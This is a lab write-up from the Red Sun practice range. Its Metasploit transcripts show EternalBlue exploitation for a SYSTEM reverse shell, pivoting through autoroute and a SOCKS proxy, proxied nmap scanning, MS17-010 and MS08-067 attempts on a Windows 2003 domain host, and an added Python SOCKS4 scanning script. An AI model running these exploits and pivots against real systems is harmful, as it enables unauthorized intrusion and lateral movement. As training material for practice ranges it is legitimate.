Continuing the penetration of the 红日靶场 (Red Sun range)


Side note: if something fails along the way, remember to run msfdb init first.

Preface: the starting point is the Meterpreter shell obtained earlier via ms17_010 (the exploit is rerun below to get the session back):

┌──(kali㉿kali)-[~]
└─$ msfconsole                                     

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:                                           
             ;kOOOOOOOOOOOOOOOk:                                             
               ,xOOOOOOOOOOOx,                                               
                 .lOOOOOOOl.                                                 
                    ,dOd,                                                    
                      .                                                      

       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try 
globally setting it with setg RHOSTS x.x.x.x

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.239.53
rhost => 192.168.239.53
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4567
lport => 4567
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.239.58
lhost => 192.168.239.58
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.239.58:4567 
[*] 192.168.239.53:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.239.53:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.239.53:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.239.53:445 - The target is vulnerable.
[*] 192.168.239.53:445 - Connecting to target for exploitation.
[+] 192.168.239.53:445 - Connection established for exploitation.
[+] 192.168.239.53:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.239.53:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.239.53:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.239.53:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.239.53:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.239.53:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.239.53:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.239.53:445 - Sending all but last fragment of exploit packet
[*] 192.168.239.53:445 - Starting non-paged pool grooming
[+] 192.168.239.53:445 - Sending SMBv2 buffers
[+] 192.168.239.53:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.239.53:445 - Sending final SMBv2 buffers.
[*] 192.168.239.53:445 - Sending last fragment of exploit packet!
[*] 192.168.239.53:445 - Receiving response from exploit packet
[+] 192.168.239.53:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.239.53:445 - Sending egg to corrupted connection.
[*] 192.168.239.53:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.239.53
[*] Meterpreter session 1 opened (192.168.239.58:4567 -> 192.168.239.53:1202 ) at 2022-05-29 03:11:15 -0400
[+] 192.168.239.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.239.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.239.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > Getsystem
[-] Unknown command: Getsystem
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > run autoroute -s 192.168.52.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.52.0/255.255.255.0...
[+] Added route to 192.168.52.0/255.255.255.0 via 192.168.239.53
[*] Use the -p option to list all active routes
meterpreter > arp -a

ARP cache
=========

    IP address       MAC address        Interface
    ----------       -----------        ---------
    169.254.255.255  ff:ff:ff:ff:ff:ff  24
    192.168.52.138   00:0c:29:24:b5:4d  11
    192.168.52.255   ff:ff:ff:ff:ff:ff  11
    192.168.239.33   ac:74:09:17:8a:01  25
    192.168.239.52   50:ed:3c:1f:35:98  25
    192.168.239.57   8c:c6:81:11:7e:70  25
    192.168.239.58   00:0c:29:0b:88:fa  25
    192.168.239.239  00:d8:61:ca:0c:fd  25
    192.168.239.255  ff:ff:ff:ff:ff:ff  25
    224.0.0.22       00:00:00:00:00:00  1
    224.0.0.22       01:00:5e:00:00:16  24
    224.0.0.22       01:00:5e:00:00:16  11
    224.0.0.22       01:00:5e:00:00:16  14
    224.0.0.22       01:00:5e:00:00:16  22
    224.0.0.22       01:00:5e:00:00:16  23
    224.0.0.22       01:00:5e:00:00:16  25
    224.0.0.252      01:00:5e:00:00:fc  24
    224.0.0.252      01:00:5e:00:00:fc  11
    224.0.0.252      01:00:5e:00:00:fc  25
    255.255.255.255  ff:ff:ff:ff:ff:ff  24
    255.255.255.255  ff:ff:ff:ff:ff:ff  14
    255.255.255.255  ff:ff:ff:ff:ff:ff  22
    255.255.255.255  ff:ff:ff:ff:ff:ff  23
    255.255.255.255  ff:ff:ff:ff:ff:ff  25

Proxy setup

Note that you must background the Meterpreter session first, because the SOCKS module is run from the msf prompt:

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i

Active sessions
===============

  Id  Name  Type                 Information           Connection
  --  ----  ----                 -----------           ----------
  1         meterpreter x64/win  NT AUTHORITY\SYSTEM   192.168.239.58:4567
            dows                 @ STU1                -> 192.168.239.53:12
                                                       02  (192.168.239.53)

msf6 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/server/socks_proxy
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 auxiliary(server/socks_proxy) > show options

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted:
                                         4a, 5)

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a

After run it should print "Starting the SOCKS proxy server"; jobs lists the running proxy job. If it instead prints "Stopping...", try changing SRVHOST, or edit the proxychains config file as described below.

If proxychains fails to proxy commands from the terminal, edit its config file. Make sure the file you open is /etc/proxychains4.conf (the path differs between installs):

#
#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080
#
#
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 1080

In practice the only change needed is the last line: add socks4 127.0.0.1 1080 under [ProxyList] (matching SRVPORT 1080 and VERSION 4a set in the module), and remove the default socks4 127.0.0.1 9050 tor entry if it is still there, since with the default strict_chain every proxy in the list must be reachable or all connections fail.

After that, prefix any command with proxychains to send its TCP connections through the proxy. Now run the module:

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) > 
[*] Starting the SOCKS proxy server

If you see the lines above, the proxy is up.


msf6 auxiliary(server/socks_proxy) > proxychains nmap -Pn -sT 192.168.52.141
[*] exec: proxychains nmap -Pn -sT 192.168.52.141

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-29 03:32 EDT
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:443 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:53 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:111 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:113 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:5900 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:80 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:110 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:22 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:1025  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:554 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:1720 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:993 Interrupt: use the 'exit' command to quit
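What proxychains does for every one of the nmap -sT probes above is a SOCKS CONNECT handshake with 127.0.0.1:1080, followed by reading the proxy's granted/denied reply. The script below is an added example, not code from the original write-up, Metasploit or proxychains: it performs that SOCKS4/4a handshake directly so the mechanics are visible, and ships with a constructed fake SOCKS4 server so it runs offline. The proxy address, the target 192.168.52.141 and the ports 135/445/1025 come from the page; the function names, the FakeSocks4Proxy class and the hostname stu1 used in the hostname form are assumptions for illustration.

```python
"""SOCKS4/4a CONNECT done by hand: the handshake behind 'proxychains nmap -sT'."""
import ipaddress
import socket
import struct
import threading

SOCKS_VERSION = 4
CMD_CONNECT = 1
REPLY_GRANTED = 0x5A   # CD byte: request granted
REPLY_REJECTED = 0x5B  # CD byte: rejected or failed (what proxychains prints as "<--denied")


def build_socks4_connect(host: str, port: int, userid: bytes = b"") -> bytes:
    """Build a SOCKS4 CONNECT request.

    For an IPv4 literal the classic SOCKS4 layout is used. For a hostname the
    SOCKS4a form is used: DSTIP 0.0.0.1 plus a NUL-terminated hostname after
    the userid, so the proxy (Metasploit, through the pivot) resolves the name
    and no DNS query for intranet names leaves the attacker box. This is why the
    module is set to VERSION 4a while proxychains only needs a "socks4" line.
    """
    try:
        dst_ip = ipaddress.IPv4Address(host).packed
        tail = b""
    except ipaddress.AddressValueError:
        dst_ip = b"\x00\x00\x00\x01"
        tail = host.encode("idna") + b"\x00"
    return struct.pack("!BBH", SOCKS_VERSION, CMD_CONNECT, port) + dst_ip + userid + b"\x00" + tail


def parse_socks4_reply(data: bytes) -> int:
    """Return the CD status byte of an 8-byte SOCKS4 reply (VN must be 0)."""
    if len(data) != 8 or data[0] != 0:
        raise ValueError(f"malformed SOCKS4 reply: {data!r}")
    return data[1]


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection early")
        buf += chunk
    return buf


def _recv_cstring(sock: socket.socket) -> bytes:
    """Read a NUL-terminated field (userid / SOCKS4a hostname)."""
    buf = b""
    while (b := sock.recv(1)) not in (b"", b"\x00"):
        buf += b
    return buf


def socks4_connect(proxy: tuple, host: str, port: int, timeout: float = 5.0) -> bool:
    """Ask the proxy to CONNECT to host:port; True only if it answers 'granted'."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(build_socks4_connect(host, port))
        return parse_socks4_reply(_recv_exact(s, 8)) == REPLY_GRANTED


def scan_ports(proxy: tuple, host: str, ports) -> dict:
    """Connect-scan host through the proxy: {port: open?}. SOCKS carries only
    TCP streams, so this is all a proxied scan can ever be (nmap -sT -Pn)."""
    return {p: socks4_connect(proxy, host, p) for p in ports}


class FakeSocks4Proxy(threading.Thread):
    """Constructed stand-in for the Metasploit proxy, for offline testing only:
    grants CONNECT to `open_ports` and rejects everything else, which is how the
    real proxy answers when the pivot host's connect() to that port fails."""

    def __init__(self, open_ports):
        super().__init__(daemon=True)
        self.open_ports = set(open_ports)
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))  # ephemeral port, exposed as .port
        self.sock.listen(16)
        self.port = self.sock.getsockname()[1]
        self.start()

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            with conn:
                try:
                    req = _recv_exact(conn, 8)            # VN, CD, DSTPORT, DSTIP
                    _recv_cstring(conn)                   # userid
                    if req[4:7] == b"\x00\x00\x00" and req[7]:
                        _recv_cstring(conn)               # SOCKS4a hostname
                    dst_port = struct.unpack("!H", req[2:4])[0]
                    code = REPLY_GRANTED if dst_port in self.open_ports else REPLY_REJECTED
                    conn.sendall(struct.pack("!BBH", 0, code, dst_port) + req[4:8])
                except OSError:
                    pass


if __name__ == "__main__":
    # Real use, with the msf socks_proxy job up on 127.0.0.1:1080 (VERSION 4a)
    # and the 192.168.52.0/24 autoroute in place:
    #   scan_ports(("127.0.0.1", 1080), "192.168.52.141", [135, 445, 1025, 3389])
    demo = FakeSocks4Proxy(open_ports={135, 1025})
    print(scan_ports(("127.0.0.1", demo.port), "192.168.52.141", [135, 445, 1025]))
```

Two things this makes explicit. First, a proxied scan has to be a full TCP connect with host discovery disabled (nmap -sT -Pn): SYN, UDP and ICMP probes have no representation in SOCKS, so without those flags nmap either errors out or reports everything as down. Second, a "denied" line is not a firewall on the proxy; it is the 0x5B reply the Metasploit proxy sends back when the pivot's own connect() to that port fails, which is why 135 and 1025 came back OK and the rest were denied in the scan above.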

Pentesting the Win2003 host (remote logon)

First check whether the same trick (ms17_010) can be reused:

msf6 auxiliary(scanner/smb/smb_version) > set rhost 192.168.52.141
rhost => 192.168.52.141
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.52.141:445    - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+] 192.168.52.141:445    -   Host is running Windows 2003 (build:3790) (name:ROOT-TVI862UBEH) (domain:GOD)
[*] 192.168.52.141:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > 

Trying EternalBlue against the Win2003 host:

use exploit/windows/smb/ms17_010_psexec   // the MS17-010 module to use for Windows 2003 targets
set payload windows/meterpreter/bind_tcp

The bind payload is deliberate: 192.168.52.141 sits on the internal segment and cannot reach the attacker at 192.168.239.58, so a reverse_tcp payload would never connect back. With bind_tcp the target listens and Metasploit connects to it through the autoroute added on session 1 (a reverse payload would instead need a port forward on the pivot).

But the output shows it did not work: the overwrite and the service start both succeed and the stage is sent, yet the session dies as soon as it opens.

msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] 192.168.52.141:445 - Target OS: Windows Server 2003 3790
[*] 192.168.52.141:445 - Filling barrel with fish... done
[*] 192.168.52.141:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.52.141:445 -        [*] Preparing dynamite...
[*] 192.168.52.141:445 -                Trying stick 1 (x64)...Miss
[*] 192.168.52.141:445 -                [*] Trying stick 2 (x86)...Boom!
[*] 192.168.52.141:445 -        [+] Successfully Leaked Transaction!
[*] 192.168.52.141:445 -        [+] Successfully caught Fish-in-a-barrel
[*] 192.168.52.141:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.52.141:445 - Reading from CONNECTION struct at: 0x8cf9cd60
[*] 192.168.52.141:445 - Built a write-what-where primitive...
[+] 192.168.52.141:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.52.141:445 - Selecting native target
[*] 192.168.52.141:445 - Uploading payload... VdQZjuZS.exe
[*] 192.168.52.141:445 - Created \VdQZjuZS.exe...
[+] 192.168.52.141:445 - Service started successfully...
[*] 192.168.52.141:445 - Deleting \VdQZjuZS.exe...
[*] Started bind TCP handler against 192.168.52.141:4567
[*] Sending stage (175174 bytes) to 192.168.52.141
[-] Meterpreter session 2 is not valid and will be closed
[*] 192.168.52.141 - Meterpreter session 2 closed.  Reason: Died

Disabling the firewall and retrying ms17_010 also failed.

Next attempt, ms08_067:

msf6 exploit(windows/smb/ms17_010_psexec) > use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.52.141
rhost => 192.168.52.141
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] 192.168.52.141:445 - Automatically detecting the target...
[*] 192.168.52.141:445 - Fingerprint: Windows 2003 -  - lang:Unknown
[*] 192.168.52.141:445 - Selected Target: Windows 2003 SP0 Universal
[*] 192.168.52.141:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.52.141:4567
[*] Exploit completed, but no session was created.

Although it failed, a pop-up did appear on the win2k3 box. Note the fingerprint line: the language came back as Unknown, so auto-targeting fell back to "Windows 2003 SP0 Universal". The return addresses in ms08_067_netapi are specific to service pack and language, and when the guess is wrong the Server service usually just crashes instead of returning a shell (an error dialog on the target is consistent with that). The check to make before rerunning is show targets, then set TARGET to the entry that matches the host's actual service pack and language.
